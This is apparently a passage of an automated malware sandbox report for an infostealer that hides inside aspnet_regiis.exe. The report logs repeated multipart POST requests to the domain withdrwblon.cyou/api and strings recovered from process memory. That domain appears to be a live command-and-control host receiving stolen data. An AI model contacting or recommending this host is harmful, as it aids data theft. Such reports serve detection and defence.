Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15078Host: withdrwblon.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12836Host: withdrwblon.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20568Host: withdrwblon.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20568Host: withdrwblon.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15078Host: withdrwblon.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1249Host: withdrwblon.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1249Host: withdrwblon.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20568Host: withdrwblon.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1134Host: withdrwblon.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1134Host: withdrwblon.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1249Host: withdrwblon.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 115Host: withdrwblon.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1134Host: withdrwblon.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 115Host: withdrwblon.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 115Host: withdrwblon.cyou

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: withdrwblon.cyou

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: withdrwblon.cyou

Source: aspnet_regiis.exe, 00000005.00000003.2102800866.00000000051ED000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.2102321758.0000000004E91000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000003.2129461445.000000000503D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: aspnet_regiis.exe, 00000005.00000003.2102800866.00000000051ED000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.2102321758.0000000004E91000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000003.2129461445.000000000503D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: aspnet_regiis.exe, 00000005.00000003.2102800866.00000000051ED000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.2102321758.0000000004E91000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000003.2129461445.000000000503D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: aspnet_regiis.exe, 00000005.00000003.2102800866.00000000051ED000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.2102321758.0000000004E91000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000003.2129461445.000000000503D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: aspnet_regiis.exe, 00000005.00000003.2102800866.00000000051ED000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.2102321758.0000000004E91000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000003.2129461445.000000000503D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: aspnet_regiis.exe, 00000005.00000003.2102800866.00000000051ED000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.2102321758.0000000004E91000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000003.2129461445.000000000503D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: aspnet_regiis.exe, 00000005.00000003.2102800866.00000000051ED000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.2102321758.0000000004E91000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000003.2129461445.000000000503D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: aspnet_regiis.exe, 00000005.00000003.2102800866.00000000051ED000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.2102321758.0000000004E91000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000003.2129461445.000000000503D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: aspnet_regiis.exe, 00000005.00000003.2102800866.00000000051ED000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.2102321758.0000000004E91000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000003.2129461445.000000000503D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: aspnet_regiis.exe, 00000009.00000003.2192632256.0000000002A5A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000003.2192132723.0000000002A10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.c
Source: aspnet_regiis.exe, 00000005.00000003.2102800866.00000000051ED000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.2102321758.0000000004E91000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000003.2129461445.000000000503D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: aspnet_regiis.exe, 00000005.00000003.2102800866.00000000051ED000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.2102321758.0000000004E91000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000003.2129461445.000000000503D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: aspnet_regiis.exe, 00000005.00000003.2075017467.000000000511A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000005.00000003.2074892888.000000000511A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000005.00000003.2074798783.000000000511D000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.2074629854.0000000004EB8000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.2074501421.0000000004EB8000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.2074425670.0000000004EBB000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000003.2102385416.0000000004F6B000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000003.2102185643.0000000004F6B000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000003.2101976232.0000000004F6E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: aspnet_regiis.exe, 00000005.00000003.2075017467.000000000511A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000005.00000003.2074892888.000000000511A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000005.00000003.2074798783.000000000511D000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.2074629854.0000000004EB8000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.2074501421.0000000004EB8000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.2074425670.0000000004EBB000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000003.2102385416.0000000004F6B000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000003.2102185643.0000000004F6B000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000003.2101976232.0000000004F6E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: aspnet_regiis.exe, 00000005.00000003.2075017467.000000000511A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000005.00000003.2074892888.000000000511A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000005.00000003.2074798783.000000000511D000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.2074629854.0000000004EB8000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.2074501421.0000000004EB8000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.2074425670.0000000004EBB000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000003.2102385416.0000000004F6B000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000003.2102185643.0000000004F6B000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000003.2101976232.0000000004F6E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: aspnet_regiis.exe, 00000005.00000003.2075017467.000000000511A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000005.00000003.2074892888.000000000511A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000005.00000003.2074798783.000000000511D000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.2074629854.0000000004EB8000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.2074501421.0000000004EB8000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.2074425670.0000000004EBB000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000003.2102385416.0000000004F6B000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000003.2102185643.0000000004F6B000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000003.2101976232.0000000004F6E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: aspnet_regiis.exe, 00000005.00000003.2075017467.000000000511A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000005.00000003.2074892888.000000000511A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000005.00000003.2074798783.000000000511D000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.2074629854.0000000004EB8000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.2074501421.0000000004EB8000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.2074425670.0000000004EBB000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000003.2102385416.0000000004F6B000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000003.2102185643.0000000004F6B000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000003.2101976232.0000000004F6E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: aspnet_regiis.exe, 00000005.00000003.2075017467.000000000511A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000005.00000003.2074892888.000000000511A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000005.00000003.2074798783.000000000511D000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.2074629854.0000000004EB8000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.2074501421.0000000004EB8000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.2074425670.0000000004EBB000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000003.2102385416.0000000004F6B000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000003.2102185643.0000000004F6B000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000003.2101976232.0000000004F6E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: aspnet_regiis.exe, 00000005.00000003.2075017467.000000000511A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000005.00000003.2074892888.000000000511A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000005.00000003.2074798783.000000000511D000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.2074629854.0000000004EB8000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.2074501421.0000000004EB8000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.2074425670.0000000004EBB000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000003.2102385416.0000000004F6B000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000003.2102185643.0000000004F6B000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000003.2101976232.0000000004F6E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: aspnet_regiis.exe, 00000009.00000003.2131037044.0000000005257000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: aspnet_regiis.exe, 00000009.00000003.2131037044.0000000005257000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: aspnet_regiis.exe, 00000009.00000003.2151671497.0000000002A9B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://withdrwblon.cyou/
Source: aspnet_regiis.exe, 00000005.00000003.2135373880.0000000002C6A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000005.00000003.2122475735.0000000002C6D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000005.00000003.2117624045.0000000002C67000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000005.00000003.2117817609.0000000002C6B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000005.00000003.2122903505.0000000002C6D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000005.00000003.2118139887.0000000002C6D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000005.00000003.2117739223.0000000002C67000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://withdrwblon.cyou/4
Source: aspnet_regiis.exe, 00000009.00000003.2115491807.0000000002A8A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://withdrwblon.cyou/;
Source: aspnet_regiis.exe, 00000009.00000002.2193527673.0000000002A9B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000003.2180512449.0000000002A9C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://withdrwblon.cyou/C
Source: aspnet_regiis.exe, 00000005.00000003.2122475735.0000000002C58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://withdrwblon.cyou/CoEd
Source: aspnet_regiis.exe, 00000007.00000003.2088111868.00000000028BC000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.2088211554.00000000028BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://withdrwblon.cyou/J
Source: aspnet_regiis.exe, 00000007.00000003.2167941219.00000000028A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://withdrwblon.cyou/S
Source: aspnet_regiis.exe, 00000005.00000003.2163888758.0000000002C6D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000005.00000003.2164040531.0000000002C6D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000003.2192725506.0000000002A10000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000002.2193298279.0000000002A10000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000003.2192132723.0000000002A10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://withdrwblon.cyou/Y
Source: aspnet_regiis.exe, 00000007.00000003.2073743744.0000000002897000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://withdrwblon.cyou/_J
Source: aspnet_regiis.exe, 00000007.00000002.2182950265.0000000004F15000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://withdrwblon.cyou/a
Source: aspnet_regiis.exe, 00000009.00000002.2193172157.00000000029DC000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000003.2151671497.0000000002A9B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://withdrwblon.cyou/api
Source: aspnet_regiis.exe, 00000007.00000002.2181626465.00000000028B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://withdrwblon.cyou/api6C
Source: aspnet_regiis.exe, 00000007.00000002.2181626465.000000000281D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://withdrwblon.cyou/apiD
Source: aspnet_regiis.exe, 00000009.00000003.2154624449.0000000002A9C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000003.2151671497.0000000002A9B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://withdrwblon.cyou/apiX%
Source: aspnet_regiis.exe, 00000009.00000003.2166902326.0000000002A7C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000002.2193459254.0000000002A7E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000003.2192694382.0000000002A7D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://withdrwblon.cyou/apia
Source: aspnet_regiis.exe, 00000007.00000003.2167941219.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000002.2181626465.00000000028B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://withdrwblon.cyou/apice
Source: aspnet_regiis.exe, 00000007.00000003.2133362044.00000000028B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://withdrwblon.cyou/apid
Source: aspnet_regiis.exe, 00000005.00000002.2179104070.0000000002C50000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000005.00000003.2176086224.0000000002C50000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://withdrwblon.cyou/apies
Source: aspnet_regiis.exe, 00000005.00000003.2135615827.0000000002C50000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000005.00000003.2164188299.0000000002C50000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://withdrwblon.cyou/apihBp
Source: aspnet_regiis.exe, 00000005.00000002.2179104070.0000000002C46000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000005.00000003.2176086224.0000000002C46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://withdrwblon.cyou/apii
Source: aspnet_regiis.exe, 00000009.00000003.2128547831.0000000002A9B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://withdrwblon.cyou/apil%
Source: aspnet_regiis.exe, 00000005.00000003.2176086224.0000000002BD3000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000005.00000002.2178892830.0000000002BD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://withdrwblon.cyou/apio
Source: aspnet_regiis.exe, 00000005.00000002.2179104070.0000000002C50000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000005.00000003.2176086224.0000000002C50000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://withdrwblon.cyou/apis
Source: aspnet_regiis.exe, 00000007.00000002.2181626465.00000000028B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://withdrwblon.cyou/apita
Source: aspnet_regiis.exe, 00000007.00000002.2182950265.0000000004F15000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://withdrwblon.cyou/at
Source: aspnet_regiis.exe, 00000009.00000003.2115491807.0000000002A8A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://withdrwblon.cyou/c
Source: aspnet_regiis.exe, 00000009.00000003.2101367134.0000000002A6F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000003.2101288100.0000000002A67000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://withdrwblon.cyou/fp
Source: aspnet_regiis.exe, 00000007.00000002.2181626465.0000000002857000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://withdrwblon.cyou/g
Source: aspnet_regiis.exe, 00000009.00000003.2154624449.0000000002A9C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000003.2151671497.0000000002A9B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://withdrwblon.cyou/kink
Source: aspnet_regiis.exe, 00000009.00000003.2154624449.0000000002A9C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000003.2151671497.0000000002A9B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://withdrwblon.cyou/n&
Source: aspnet_regiis.exe, 00000005.00000003.2163888758.0000000002C6D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000003.2192725506.0000000002A10000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000002.2193298279.0000000002A10000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000003.2192132723.0000000002A10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://withdrwblon.cyou/t
Source: aspnet_regiis.exe, 00000007.00000002.2181626465.0000000002857000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://withdrwblon.cyou/wJ
Source: aspnet_regiis.exe, 00000007.00000003.2101886794.00000000028CE000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.2101654427.00000000028CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://withdrwblon.cyou/ys
Source: aspnet_regiis.exe, aspnet_regiis.exe, 00000005.00000003.2176086224.0000000002BD3000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000005.00000002.2178892830.0000000002BD3000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000002.2181626465.0000000002892000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.2073743744.0000000002897000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000002.2181626465.0000000002839000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000002.2193527673.0000000002A9B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://withdrwblon.cyou:443/api
Source: aspnet_regiis.exe, 00000005.00000003.2075017467.000000000511A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000005.00000003.2074892888.000000000511A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000005.00000003.2074798783.000000000511D000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.2074629854.0000000004EB8000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.2074501421.0000000004EB8000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.2074425670.0000000004EBB000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000003.2102385416.0000000004F6B000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000003.2102185643.0000000004F6B000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000003.2101976232.0000000004F6E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: aspnet_regiis.exe, 00000005.00000003.2075017467.000000000511A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000005.00000003.2074892888.000000000511A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000005.00000003.2074798783.000000000511D000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.2074629854.0000000004EB8000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.2074501421.0000000004EB8000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.2074425670.0000000004EBB000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000003.2102385416.0000000004F6B000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000003.2102185643.0000000004F6B000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000009.00000003.2101976232.0000000004F6E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: aspnet_regiis.exe, 00000009.00000003.2131037044.0000000005257000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
